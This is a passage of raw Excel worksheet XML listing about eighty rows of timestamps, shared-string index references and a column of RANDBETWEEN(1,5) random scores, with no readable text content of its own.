    <row r="18562" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18562" s="1">
        <v>43161.26829861111</v>
      </c>
      <c r="C18562" t="s">
        <v>535</v>
      </c>
      <c r="D18562" t="s">
        <v>312</v>
      </c>
      <c r="E18562" s="2" t="s">
        <v>16630</v>
      </c>
      <c r="F18562">
        <f t="shared" ref="F18562:F18625" ca="1" si="290">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="18563" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18563" s="1">
        <v>43161.25105324074</v>
      </c>
      <c r="C18563" t="s">
        <v>542</v>
      </c>
      <c r="E18563" s="2" t="s">
        <v>16631</v>
      </c>
      <c r="F18563">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18564" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A18564" s="1">
        <v>43161.195127314815</v>
      </c>
      <c r="C18564" t="s">
        <v>776</v>
      </c>
      <c r="E18564" s="2" t="s">
        <v>16632</v>
      </c>
      <c r="F18564">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18565" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18565" s="1">
        <v>43161.186111111114</v>
      </c>
      <c r="C18565" t="s">
        <v>1080</v>
      </c>
      <c r="D18565" t="s">
        <v>46</v>
      </c>
      <c r="E18565" s="2" t="s">
        <v>16633</v>
      </c>
      <c r="F18565">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18566" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18566" s="1">
        <v>43161.161481481482</v>
      </c>
      <c r="C18566" t="s">
        <v>477</v>
      </c>
      <c r="D18566" t="s">
        <v>821</v>
      </c>
      <c r="E18566" s="2" t="s">
        <v>16634</v>
      </c>
      <c r="F18566">
        <f t="shared" ca="1" si="290"/>
        <v>5</v>
      </c>
    </row>
    <row r="18567" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A18567" s="1">
        <v>43161.140266203707</v>
      </c>
      <c r="C18567" t="s">
        <v>314</v>
      </c>
      <c r="E18567" s="2" t="s">
        <v>16635</v>
      </c>
      <c r="F18567">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18568" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A18568" s="1">
        <v>43161.133703703701</v>
      </c>
      <c r="C18568" t="s">
        <v>318</v>
      </c>
      <c r="E18568" s="2" t="s">
        <v>16636</v>
      </c>
      <c r="F18568">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18569" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A18569" s="1">
        <v>43161.107442129629</v>
      </c>
      <c r="C18569" t="s">
        <v>65</v>
      </c>
      <c r="E18569" s="2" t="s">
        <v>16637</v>
      </c>
      <c r="F18569">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18570" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18570" s="1">
        <v>43161.045914351853</v>
      </c>
      <c r="C18570" t="s">
        <v>29</v>
      </c>
      <c r="D18570" t="s">
        <v>52</v>
      </c>
      <c r="E18570" s="2" t="s">
        <v>16283</v>
      </c>
      <c r="F18570">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18571" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18571" s="1">
        <v>43161.025787037041</v>
      </c>
      <c r="C18571" t="s">
        <v>41</v>
      </c>
      <c r="E18571" t="s">
        <v>16638</v>
      </c>
      <c r="F18571">
        <f t="shared" ca="1" si="290"/>
        <v>1</v>
      </c>
    </row>
    <row r="18572" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18572" s="1">
        <v>43161.023668981485</v>
      </c>
      <c r="C18572" t="s">
        <v>41</v>
      </c>
      <c r="E18572" t="s">
        <v>16639</v>
      </c>
      <c r="F18572">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18573" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18573" s="1">
        <v>43160.725578703707</v>
      </c>
      <c r="C18573" t="s">
        <v>29</v>
      </c>
      <c r="D18573" t="s">
        <v>14</v>
      </c>
      <c r="E18573" s="2" t="s">
        <v>16283</v>
      </c>
      <c r="F18573">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18574" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18574" s="1">
        <v>43160.712152777778</v>
      </c>
      <c r="C18574" t="s">
        <v>260</v>
      </c>
      <c r="E18574" s="2" t="s">
        <v>16640</v>
      </c>
      <c r="F18574">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18575" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18575" s="1">
        <v>43160.692499999997</v>
      </c>
      <c r="C18575" t="s">
        <v>10</v>
      </c>
      <c r="D18575" t="s">
        <v>381</v>
      </c>
      <c r="E18575" t="s">
        <v>16641</v>
      </c>
      <c r="F18575">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18576" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18576" s="1">
        <v>43160.677800925929</v>
      </c>
      <c r="C18576" t="s">
        <v>6</v>
      </c>
      <c r="D18576" t="s">
        <v>114</v>
      </c>
      <c r="E18576" t="s">
        <v>16642</v>
      </c>
      <c r="F18576">
        <f t="shared" ca="1" si="290"/>
        <v>5</v>
      </c>
    </row>
    <row r="18577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18577" s="1">
        <v>43160.669629629629</v>
      </c>
      <c r="C18577" t="s">
        <v>10</v>
      </c>
      <c r="D18577" t="s">
        <v>14</v>
      </c>
      <c r="E18577" t="s">
        <v>16643</v>
      </c>
      <c r="F18577">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18578" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18578" s="1">
        <v>43160.649571759262</v>
      </c>
      <c r="C18578" t="s">
        <v>10</v>
      </c>
      <c r="D18578" t="s">
        <v>17</v>
      </c>
      <c r="E18578" t="s">
        <v>16644</v>
      </c>
      <c r="F18578">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18579" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18579" s="1">
        <v>43160.649363425924</v>
      </c>
      <c r="C18579" t="s">
        <v>10</v>
      </c>
      <c r="D18579" t="s">
        <v>271</v>
      </c>
      <c r="E18579" t="s">
        <v>16645</v>
      </c>
      <c r="F18579">
        <f t="shared" ca="1" si="290"/>
        <v>5</v>
      </c>
    </row>
    <row r="18580" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18580" s="1">
        <v>43160.636458333334</v>
      </c>
      <c r="C18580" t="s">
        <v>10</v>
      </c>
      <c r="D18580" t="s">
        <v>17</v>
      </c>
      <c r="E18580" t="s">
        <v>16646</v>
      </c>
      <c r="F18580">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18581" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18581" s="1">
        <v>43160.626689814817</v>
      </c>
      <c r="C18581" t="s">
        <v>10</v>
      </c>
      <c r="D18581" t="s">
        <v>46</v>
      </c>
      <c r="E18581" t="s">
        <v>16647</v>
      </c>
      <c r="F18581">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18582" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18582" s="1">
        <v>43160.624976851854</v>
      </c>
      <c r="C18582" t="s">
        <v>10</v>
      </c>
      <c r="D18582" t="s">
        <v>86</v>
      </c>
      <c r="E18582" t="s">
        <v>16648</v>
      </c>
      <c r="F18582">
        <f t="shared" ca="1" si="290"/>
        <v>1</v>
      </c>
    </row>
    <row r="18583" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18583" s="1">
        <v>43160.592997685184</v>
      </c>
      <c r="C18583" t="s">
        <v>10</v>
      </c>
      <c r="D18583" t="s">
        <v>89</v>
      </c>
      <c r="E18583" s="2" t="s">
        <v>16649</v>
      </c>
      <c r="F18583">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18584" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18584" s="1">
        <v>43160.575497685182</v>
      </c>
      <c r="C18584" t="s">
        <v>10</v>
      </c>
      <c r="D18584" t="s">
        <v>92</v>
      </c>
      <c r="E18584" s="2" t="s">
        <v>16650</v>
      </c>
      <c r="F18584">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18585" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18585" s="1">
        <v>43160.570289351854</v>
      </c>
      <c r="C18585" t="s">
        <v>10</v>
      </c>
      <c r="D18585" t="s">
        <v>89</v>
      </c>
      <c r="E18585" t="s">
        <v>16651</v>
      </c>
      <c r="F18585">
        <f t="shared" ca="1" si="290"/>
        <v>1</v>
      </c>
    </row>
    <row r="18586" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A18586" s="1">
        <v>43160.563240740739</v>
      </c>
      <c r="C18586" t="s">
        <v>1611</v>
      </c>
      <c r="D18586" t="s">
        <v>56</v>
      </c>
      <c r="E18586" s="2" t="s">
        <v>16652</v>
      </c>
      <c r="F18586">
        <f t="shared" ca="1" si="290"/>
        <v>5</v>
      </c>
    </row>
    <row r="18587" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A18587" s="1">
        <v>43160.542199074072</v>
      </c>
      <c r="C18587" t="s">
        <v>686</v>
      </c>
      <c r="E18587" s="2" t="s">
        <v>16653</v>
      </c>
      <c r="F18587">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18588" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18588" s="1">
        <v>43160.533159722225</v>
      </c>
      <c r="C18588" t="s">
        <v>10</v>
      </c>
      <c r="D18588" t="s">
        <v>89</v>
      </c>
      <c r="E18588" t="s">
        <v>16654</v>
      </c>
      <c r="F18588">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18589" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18589" s="1">
        <v>43160.491990740738</v>
      </c>
      <c r="C18589" t="s">
        <v>10</v>
      </c>
      <c r="D18589" t="s">
        <v>89</v>
      </c>
      <c r="E18589" t="s">
        <v>16655</v>
      </c>
      <c r="F18589">
        <f t="shared" ca="1" si="290"/>
        <v>5</v>
      </c>
    </row>
    <row r="18590" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18590" s="1">
        <v>43160.486342592594</v>
      </c>
      <c r="C18590" t="s">
        <v>10</v>
      </c>
      <c r="D18590" t="s">
        <v>36</v>
      </c>
      <c r="E18590" s="2" t="s">
        <v>16656</v>
      </c>
      <c r="F18590">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18591" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18591" s="1">
        <v>43160.481041666666</v>
      </c>
      <c r="C18591" t="s">
        <v>41</v>
      </c>
      <c r="E18591" t="s">
        <v>16657</v>
      </c>
      <c r="F18591">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18592" s="1">
        <v>43160.476365740738</v>
      </c>
      <c r="C18592" t="s">
        <v>10</v>
      </c>
      <c r="D18592" t="s">
        <v>290</v>
      </c>
      <c r="E18592" t="s">
        <v>16658</v>
      </c>
      <c r="F18592">
        <f t="shared" ca="1" si="290"/>
        <v>1</v>
      </c>
    </row>
    <row r="18593" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18593" s="1">
        <v>43160.468657407408</v>
      </c>
      <c r="C18593" t="s">
        <v>65</v>
      </c>
      <c r="E18593" s="2" t="s">
        <v>16659</v>
      </c>
      <c r="F18593">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18594" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18594" s="1">
        <v>43160.46733796296</v>
      </c>
      <c r="C18594" t="s">
        <v>65</v>
      </c>
      <c r="E18594" s="2" t="s">
        <v>16659</v>
      </c>
      <c r="F18594">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18595" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18595" s="1">
        <v>43160.46502314815</v>
      </c>
      <c r="C18595" t="s">
        <v>10</v>
      </c>
      <c r="D18595" t="s">
        <v>89</v>
      </c>
      <c r="E18595" t="s">
        <v>16660</v>
      </c>
      <c r="F18595">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18596" s="1">
        <v>43160.442314814813</v>
      </c>
      <c r="C18596" t="s">
        <v>10</v>
      </c>
      <c r="D18596" t="s">
        <v>80</v>
      </c>
      <c r="E18596" t="s">
        <v>16661</v>
      </c>
      <c r="F18596">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18597" s="1">
        <v>43160.424178240741</v>
      </c>
      <c r="C18597" t="s">
        <v>10</v>
      </c>
      <c r="D18597" t="s">
        <v>112</v>
      </c>
      <c r="E18597" t="s">
        <v>16662</v>
      </c>
      <c r="F18597">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18598" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18598" s="1">
        <v>43160.378958333335</v>
      </c>
      <c r="C18598" t="s">
        <v>71</v>
      </c>
      <c r="E18598" s="2" t="s">
        <v>16663</v>
      </c>
      <c r="F18598">
        <f t="shared" ca="1" si="290"/>
        <v>5</v>
      </c>
    </row>
    <row r="18599" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18599" s="1">
        <v>43160.354039351849</v>
      </c>
      <c r="C18599" t="s">
        <v>10</v>
      </c>
      <c r="D18599" t="s">
        <v>271</v>
      </c>
      <c r="E18599" s="2" t="s">
        <v>16664</v>
      </c>
      <c r="F18599">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18600" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18600" s="1">
        <v>43160.346701388888</v>
      </c>
      <c r="C18600" t="s">
        <v>10</v>
      </c>
      <c r="D18600" t="s">
        <v>86</v>
      </c>
      <c r="E18600" s="2" t="s">
        <v>16665</v>
      </c>
      <c r="F18600">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18601" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18601" s="1">
        <v>43160.33016203704</v>
      </c>
      <c r="C18601" t="s">
        <v>48</v>
      </c>
      <c r="E18601" s="2" t="s">
        <v>16666</v>
      </c>
      <c r="F18601">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18602" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18602" s="1">
        <v>43160.322615740741</v>
      </c>
      <c r="C18602" t="s">
        <v>127</v>
      </c>
      <c r="D18602" t="s">
        <v>271</v>
      </c>
      <c r="E18602" t="s">
        <v>16667</v>
      </c>
      <c r="F18602">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18603" s="1">
        <v>43160.298333333332</v>
      </c>
      <c r="C18603" t="s">
        <v>43</v>
      </c>
      <c r="E18603" t="s">
        <v>16668</v>
      </c>
      <c r="F18603">
        <f t="shared" ca="1" si="290"/>
        <v>1</v>
      </c>
    </row>
    <row r="18604" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18604" s="1">
        <v>43160.296134259261</v>
      </c>
      <c r="C18604" t="s">
        <v>430</v>
      </c>
      <c r="E18604" t="s">
        <v>16669</v>
      </c>
      <c r="F18604">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18605" s="1">
        <v>43160.273043981484</v>
      </c>
      <c r="C18605" t="s">
        <v>41</v>
      </c>
      <c r="E18605" t="s">
        <v>16670</v>
      </c>
      <c r="F18605">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18606" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18606" s="1">
        <v>43160.272118055553</v>
      </c>
      <c r="C18606" t="s">
        <v>48</v>
      </c>
      <c r="E18606" s="2" t="s">
        <v>16671</v>
      </c>
      <c r="F18606">
        <f t="shared" ca="1" si="290"/>
        <v>5</v>
      </c>
    </row>
    <row r="18607" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18607" s="1">
        <v>43160.267314814817</v>
      </c>
      <c r="C18607" t="s">
        <v>454</v>
      </c>
      <c r="D18607" t="s">
        <v>821</v>
      </c>
      <c r="E18607" s="2" t="s">
        <v>16672</v>
      </c>
      <c r="F18607">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18608" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A18608" s="1">
        <v>43160.228495370371</v>
      </c>
      <c r="C18608" t="s">
        <v>45</v>
      </c>
      <c r="E18608" s="2" t="s">
        <v>16673</v>
      </c>
      <c r="F18608">
        <f t="shared" ca="1" si="290"/>
        <v>1</v>
      </c>
    </row>
    <row r="18609" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A18609" s="1">
        <v>43160.219421296293</v>
      </c>
      <c r="C18609" t="s">
        <v>189</v>
      </c>
      <c r="E18609" s="2" t="s">
        <v>16674</v>
      </c>
      <c r="F18609">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18610" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18610" s="1">
        <v>43160.181539351855</v>
      </c>
      <c r="C18610" t="s">
        <v>43</v>
      </c>
      <c r="E18610" s="2" t="s">
        <v>16675</v>
      </c>
      <c r="F18610">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18611" s="1">
        <v>43160.115162037036</v>
      </c>
      <c r="C18611" t="s">
        <v>60</v>
      </c>
      <c r="E18611" t="s">
        <v>16676</v>
      </c>
      <c r="F18611">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18612" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18612" s="1">
        <v>43160.095509259256</v>
      </c>
      <c r="C18612" t="s">
        <v>173</v>
      </c>
      <c r="E18612" s="2" t="s">
        <v>16677</v>
      </c>
      <c r="F18612">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18613" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18613" s="1">
        <v>43160.08494212963</v>
      </c>
      <c r="C18613" t="s">
        <v>41</v>
      </c>
      <c r="E18613" t="s">
        <v>16678</v>
      </c>
      <c r="F18613">
        <f t="shared" ca="1" si="290"/>
        <v>4</v>
      </c>
    </row>
    <row r="18614" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A18614" s="1">
        <v>43160.081875000003</v>
      </c>
      <c r="C18614" t="s">
        <v>139</v>
      </c>
      <c r="E18614" s="2" t="s">
        <v>16679</v>
      </c>
      <c r="F18614">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18615" s="1">
        <v>43160.015821759262</v>
      </c>
      <c r="C18615" t="s">
        <v>41</v>
      </c>
      <c r="F18615">
        <f t="shared" ca="1" si="290"/>
        <v>5</v>
      </c>
    </row>
    <row r="18616" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A18616" s="1">
        <v>43159.993750000001</v>
      </c>
      <c r="C18616" t="s">
        <v>634</v>
      </c>
      <c r="D18616" t="s">
        <v>602</v>
      </c>
      <c r="E18616" s="2" t="s">
        <v>16680</v>
      </c>
      <c r="F18616">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18617" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18617" s="1">
        <v>43159.92869212963</v>
      </c>
      <c r="C18617" t="s">
        <v>333</v>
      </c>
      <c r="D18617" t="s">
        <v>107</v>
      </c>
      <c r="E18617" s="2" t="s">
        <v>16681</v>
      </c>
      <c r="F18617">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18618" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18618" s="1">
        <v>43159.798055555555</v>
      </c>
      <c r="C18618" t="s">
        <v>140</v>
      </c>
      <c r="D18618" t="s">
        <v>141</v>
      </c>
      <c r="E18618" s="2" t="s">
        <v>16682</v>
      </c>
      <c r="F18618">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18619" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18619" s="1">
        <v>43159.759247685186</v>
      </c>
      <c r="C18619" t="s">
        <v>10</v>
      </c>
      <c r="D18619" t="s">
        <v>89</v>
      </c>
      <c r="E18619" t="s">
        <v>16683</v>
      </c>
      <c r="F18619">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18620" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18620" s="1">
        <v>43159.743657407409</v>
      </c>
      <c r="C18620" t="s">
        <v>10</v>
      </c>
      <c r="D18620" t="s">
        <v>23</v>
      </c>
      <c r="E18620" s="2" t="s">
        <v>16684</v>
      </c>
      <c r="F18620">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18621" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18621" s="1">
        <v>43159.708344907405</v>
      </c>
      <c r="C18621" t="s">
        <v>10</v>
      </c>
      <c r="D18621" t="s">
        <v>107</v>
      </c>
      <c r="E18621" s="2" t="s">
        <v>16685</v>
      </c>
      <c r="F18621">
        <f t="shared" ca="1" si="290"/>
        <v>2</v>
      </c>
    </row>
    <row r="18622" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A18622" s="1">
        <v>43159.701238425929</v>
      </c>
      <c r="C18622" t="s">
        <v>10</v>
      </c>
      <c r="D18622" t="s">
        <v>94</v>
      </c>
      <c r="E18622" s="2" t="s">
        <v>16686</v>
      </c>
      <c r="F18622">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18623" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18623" s="1">
        <v>43159.698599537034</v>
      </c>
      <c r="C18623" t="s">
        <v>10</v>
      </c>
      <c r="D18623" t="s">
        <v>290</v>
      </c>
      <c r="E18623" t="s">
        <v>16687</v>
      </c>
      <c r="F18623">
        <f t="shared" ca="1" si="290"/>
        <v>1</v>
      </c>
    </row>
    <row r="18624" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18624" s="1">
        <v>43159.69703703704</v>
      </c>
      <c r="C18624" t="s">
        <v>10</v>
      </c>
      <c r="D18624" t="s">
        <v>20</v>
      </c>
      <c r="E18624" t="s">
        <v>16688</v>
      </c>
      <c r="F18624">
        <f t="shared" ca="1" si="290"/>
        <v>3</v>
      </c>
    </row>
    <row r="18625" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18625" s="1">
        <v>43159.688206018516</v>
      </c>
      <c r="C18625" t="s">
        <v>10</v>
      </c>
      <c r="D18625" t="s">
        <v>14</v>
      </c>
      <c r="E18625" t="s">
        <v>16689</v>
      </c>
      <c r="F18625">
        <f t="shared" ca="1" si="290"/>
        <v>1</v>
      </c>
    </row>
    <row r="18626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18626" s="1">
        <v>43159.679745370369</v>
      </c>
      <c r="C18626" t="s">
        <v>10</v>
      </c>
      <c r="D18626" t="s">
        <v>20</v>
      </c>
      <c r="E18626" t="s">
        <v>16690</v>
      </c>
      <c r="F18626">
        <f t="shared" ref="F18626:F18689" ca="1" si="291">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="18627" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18627" s="1">
        <v>43159.657048611109</v>
      </c>
      <c r="C18627" t="s">
        <v>10</v>
      </c>
      <c r="D18627" t="s">
        <v>6</v>
      </c>
      <c r="E18627" s="2" t="s">
        <v>16691</v>
      </c>
      <c r="F18627">
        <f t="shared" ca="1" si="291"/>
        <v>2</v>
      </c>
    </row>
    <row r="18628" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A18628" s="1">
        <v>43159.655671296299</v>
      </c>
      <c r="C18628" t="s">
        <v>10</v>
      </c>
      <c r="D18628" t="s">
        <v>112</v>
      </c>
      <c r="E18628" s="2" t="s">
        <v>16692</v>
      </c>
      <c r="F18628">
        <f t="shared" ca="1" si="291"/>
        <v>2</v>
      </c>
    </row>
    <row r="18629" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18629" s="1">
        <v>43159.649224537039</v>
      </c>
      <c r="C18629" t="s">
        <v>10</v>
      </c>
      <c r="D18629" t="s">
        <v>80</v>
      </c>
      <c r="E18629" t="s">
        <v>16693</v>
      </c>
      <c r="F18629">
        <f t="shared" ca="1" si="291"/>
        <v>5</v>
      </c>
    </row>
    <row r="18630" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18630" s="1">
        <v>43159.640370370369</v>
      </c>
      <c r="C18630" t="s">
        <v>41</v>
      </c>
      <c r="E18630" t="s">
        <v>16694</v>
      </c>
      <c r="F18630">
        <f t="shared" ca="1" si="291"/>
        <v>4</v>
      </c>
    </row>
    <row r="18631" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18631" s="1">
        <v>43159.638715277775</v>
      </c>
      <c r="C18631" t="s">
        <v>10</v>
      </c>
      <c r="D18631" t="s">
        <v>993</v>
      </c>
      <c r="E18631" s="2" t="s">
        <v>16695</v>
      </c>
      <c r="F18631">
        <f t="shared" ca="1" si="291"/>
        <v>2</v>
      </c>
    </row>
    <row r="18632" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18632" s="1">
        <v>43159.604456018518</v>
      </c>
      <c r="C18632" t="s">
        <v>107</v>
      </c>
      <c r="E18632" s="2" t="s">
        <v>16696</v>
      </c>
      <c r="F18632">
        <f t="shared" ca="1" si="291"/>
        <v>2</v>
      </c>
    </row>
    <row r="18633" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18633" s="1">
        <v>43159.600324074076</v>
      </c>
      <c r="C18633" t="s">
        <v>10</v>
      </c>
      <c r="D18633" t="s">
        <v>192</v>
      </c>
      <c r="E18633" t="s">
        <v>16697</v>
      </c>
      <c r="F18633">
        <f t="shared" ca="1" si="291"/>
        <v>4</v>
      </c>
    </row>
    <row r="18634" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18634" s="1">
        <v>43159.6</v>
      </c>
      <c r="C18634" t="s">
        <v>260</v>
      </c>
      <c r="E18634" t="s">
        <v>16698</v>
      </c>
      <c r="F18634">
        <f t="shared" ca="1" si="291"/>
        <v>5</v>
      </c>
    </row>
    <row r="18635" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18635" s="1">
        <v>43159.595127314817</v>
      </c>
      <c r="C18635" t="s">
        <v>10</v>
      </c>
      <c r="D18635" t="s">
        <v>290</v>
      </c>
      <c r="E18635" t="s">
        <v>16699</v>
      </c>
      <c r="F18635">
        <f t="shared" ca="1" si="291"/>
        <v>5</v>
      </c>
    </row>
    <row r="18636" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18636" s="1">
        <v>43159.581909722219</v>
      </c>
      <c r="C18636" t="s">
        <v>10</v>
      </c>
      <c r="D18636" t="s">
        <v>6</v>
      </c>
      <c r="E18636" t="s">
        <v>16700</v>
      </c>
      <c r="F18636">
        <f t="shared" ca="1" si="291"/>
        <v>3</v>
      </c>
    </row>
    <row r="18637" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18637" s="1">
        <v>43159.557638888888</v>
      </c>
      <c r="C18637" t="s">
        <v>10</v>
      </c>
      <c r="D18637" t="s">
        <v>112</v>
      </c>
      <c r="E18637" t="s">
        <v>16701</v>
      </c>
      <c r="F18637">
        <f t="shared" ca="1" si="291"/>
        <v>3</v>
      </c>
    </row>
    <row r="18638" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18638" s="1">
        <v>43159.548483796294</v>
      </c>
      <c r="C18638" t="s">
        <v>10</v>
      </c>
      <c r="D18638" t="s">
        <v>330</v>
      </c>
      <c r="E18638" s="2" t="s">
        <v>16702</v>
      </c>
      <c r="F18638">
        <f t="shared" ca="1" si="291"/>
        <v>1</v>
      </c>
    </row>
    <row r="18639" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18639" s="1">
        <v>43159.532418981478</v>
      </c>
      <c r="C18639" t="s">
        <v>10</v>
      </c>
